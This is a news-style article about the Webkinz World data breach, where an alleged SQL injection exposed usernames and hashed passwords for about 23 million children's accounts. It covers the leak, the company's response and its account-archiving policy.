How was Webkinz Hacked?
Webkinz World is a game launched in 2005 by the Canadian toy company Ganz. The online game complements a line of Ganz plush toys produced by the company. The plush toys come with a code that can be entered onto the Webkinz website creating a kind of virtual pet. Children can then play with and look after their virtual pet. The game is very popular with children and is reportedly one of the most successful online children’s games of the past decade. ZDNet reports that the vulnerability in the game had been discovered months earlier. Information about the vulnerability had been circulating on hacking forums and on online IM chat groups for months. The known vulnerability was in one of the Webkinz website’s web forms. ZDNet reports that the hacker “allegedly gained access to the games database using an SQL injection vulnerability present in one of the website’s web forms.”
What was Leaked
The hacker leaked the usernames and passwords to nearly 23 million children’s accounts for the Webkinz World game. The attacker hacked the game and posted the logon data on a popular hacking forum. Hashed versions of parents’ email addresses were also obtained, but these were not leaked. A company spokesperson said: “A number of years ago we took extra efforts to improve our encryption techniques, so that if a day came where any data did get out, it would be protected. We are currently reviewing all of the points of entry into our data to ensure that a similar attack won’t work elsewhere.” The 1 Gb file containing the logon credentials stemmed from the game’s database. Although the data was leaked on the weekend, the actual security breach from which the data stems reportedly occurred earlier in the month. Webkinz have stated that they detected the breach and have since patched the point of entry used by the hacker. Furthermore, the children’s account passwords stored in the database were encrypted with the MD5-Crypt algorithm. However, this encryption algorithm can be cracked using brute force or an MD5 database.
Current or Archived Data
According to Webkinz, user accounts that have remained inactive for more than 18 months are archived. As part of the archive process, all information associated with the account is removed leaving only the username and password. This is done for security purposes, so that if an intrusion occurs no information of value is stolen. It is still unknown whether the leaked data belongs to these archived accounts or to current active accounts.